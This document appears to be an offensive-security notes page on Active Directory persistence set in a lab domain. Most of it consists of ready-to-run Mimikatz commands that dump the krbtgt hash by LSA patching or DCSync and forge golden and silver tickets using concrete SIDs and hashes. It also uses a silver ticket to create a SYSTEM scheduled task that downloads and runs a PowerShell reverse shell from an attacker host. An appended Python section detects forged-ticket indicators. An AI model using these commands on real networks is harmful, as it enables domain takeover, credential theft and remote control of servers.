> For the complete documentation index, see [llms.txt](https://likhith-cv.gitbook.io/wicked-security/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://likhith-cv.gitbook.io/wicked-security/active-directory/active-directory/persistance.md).

# Persistence

The DC only validates the account behind a TGT once the ticket is more than 20 minutes old, so even deleted accounts can be used:\
the KDC only checks the TGT itself.

## Kerberos

## Golden Ticket

A golden ticket is a forged TGT with a very long lifetime, for example 10 years.\
It is encrypted with the hash of the krbtgt account.\
First create a token on behalf of a domain admin.

## Execute mimikatz on the DC as DA to get the krbtgt hash

```
klist purge   # delete all cached tickets first
Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -ComputerName dcorp-dc
```

To get the krbtgt hash with the DCSync feature instead, execute the command below with DA privileges:

```
Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\krbtgt"'
```

The DCSync option needs no code execution on the target DC (Invoke-Mimikatz does not have to run there).

## Create the golden ticket on any machine

```
# /krbtgt is the krbtgt NTLM hash obtained above; /ptt injects the forged TGT into the current session
Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /krbtgt:ff46a9d8bd66c6efd77603da26796f35 /id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt"'
```

## Silver Ticket

A silver ticket is a forged service ticket: it has a much shorter lifetime and only gives access to the services run by the service account.\
It is encrypted with the hash of the service account.\
Silver tickets can be issued for services such as HOST (scheduled tasks), CIFS (shares), RPCSS and WSMAN.

Here the service account is a machine account, for example DCORP-DC$ (1000).

```
# /rc4 is the NTLM hash of the DC machine account; /target is the host whose CIFS service the ticket is for
Invoke-Mimikatz -Command '"kerberos::golden /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /target:dcorpdc.dollarcorp.moneycorp.local /service:cifs /rc4:3c2392cdec22c2edb6e27381ee619849 /user:Administrator /ptt"'
```

## Command Execution with a Silver Ticket

```
# Same as above, but for the HOST service, which covers scheduled tasks on the target
Invoke-Mimikatz -Command '"kerberos::golden /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /target:dcorpdc.dollarcorp.moneycorp.local /service:HOST /rc4:3c2392cdec22c2edb6e27381ee619849 /user:Administrator /ptt"'
```

```
# Add the following line at the end of the Invoke-PowerShellTcp.ps1 script:
Invoke-PowerShellTcp -Reverse -IPAddress 172.16.100.82 -Port 443

# With the HOST silver ticket injected, create a scheduled task on the DC that downloads and runs the script
schtasks /create /S dcorp-dc.dollarcorp.moneycorp.local /SC Weekly /RU "NT Authority\SYSTEM" /TN "STCheck" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.82:1337/Invoke-PowerShellTcp1.ps1''')'"

# On the attacking host: serve the script and start the listener
python -m SimpleHTTPServer 1337
powercat -l -v -p 443

# Trigger the task
schtasks /Run /S dcorp-dc.dollarcorp.moneycorp.local /TN "STCheck"
```
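As an added defender-side example, not from the original page, the following Python checks ticket records for the indicators the notes above imply: a TGT whose lifetime is far beyond policy, a ticket for an account the directory no longer contains, an RC4 ticket built from an NT hash, and a service ticket used with no TGT issued by the KDC. The record layout, the known-account set and the 10-hour policy maximum are constructed assumptions, not a parser for Windows 4768/4769 event XML.

```python
from datetime import datetime, timedelta

# Assumed domain policy: TGTs are normally issued for at most 10 hours.
MAX_TGT_LIFETIME = timedelta(hours=10)
RC4_HMAC = 0x17  # etype used when a ticket is forged from an NT (RC4) hash

# Accounts that currently exist in the directory (constructed for this example).
KNOWN_ACCOUNTS = {"Administrator", "DCORP-DC$"}

# Constructed, simplified ticket records, not real Windows event log lines.
# kind "tgt": a TGT issued by the KDC; kind "svc": a service ticket accepted by a host.
RECORDS = [
    {"kind": "tgt", "account": "Administrator", "etype": 0x12,
     "start": "2024-03-01T08:00:00", "end": "2024-03-01T18:00:00"},
    {"kind": "svc", "account": "Administrator", "service": "cifs/dcorp-dc", "etype": 0x12,
     "start": "2024-03-01T08:05:00", "end": "2024-03-01T18:00:00"},
    # Golden-ticket pattern: RC4, ten-year lifetime, account no longer in the directory.
    {"kind": "tgt", "account": "olduser", "etype": 0x17,
     "start": "2024-03-01T09:00:00", "end": "2034-02-27T09:00:00"},
    # Silver-ticket pattern: RC4 service ticket with no TGT issued for that session.
    {"kind": "svc", "account": "Administrator", "service": "host/dcorp-dc", "etype": 0x17,
     "start": "2024-03-02T01:00:00", "end": "2024-03-02T11:00:00"},
]


def _ts(value):
    return datetime.fromisoformat(value)


def find_forged_ticket_indicators(records, known_accounts, max_tgt=MAX_TGT_LIFETIME):
    """Return (record_index, reason) pairs for records showing a forgery indicator."""
    findings = []
    tgts = [r for r in records if r["kind"] == "tgt"]
    for i, rec in enumerate(records):
        start, end = _ts(rec["start"]), _ts(rec["end"])
        if rec["account"] not in known_accounts:
            findings.append((i, "account not in directory (deleted or fabricated)"))
        if rec["etype"] == RC4_HMAC:
            findings.append((i, "RC4-HMAC ticket; forged from an NT hash or legacy config"))
        if rec["kind"] == "tgt" and end - start > max_tgt:
            findings.append((i, "TGT lifetime exceeds domain policy"))
        # A genuine service ticket is only obtained with a TGT the KDC issued earlier.
        if rec["kind"] == "svc" and not any(
            t["account"] == rec["account"] and _ts(t["start"]) <= start <= _ts(t["end"])
            for t in tgts
        ):
            findings.append((i, "service ticket with no covering TGT from the KDC"))
    return findings
```

On the constructed records the first two (a normal TGT and a CIFS ticket obtained under it) produce no findings, while the golden-ticket and silver-ticket patterns are each flagged on several indicators.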
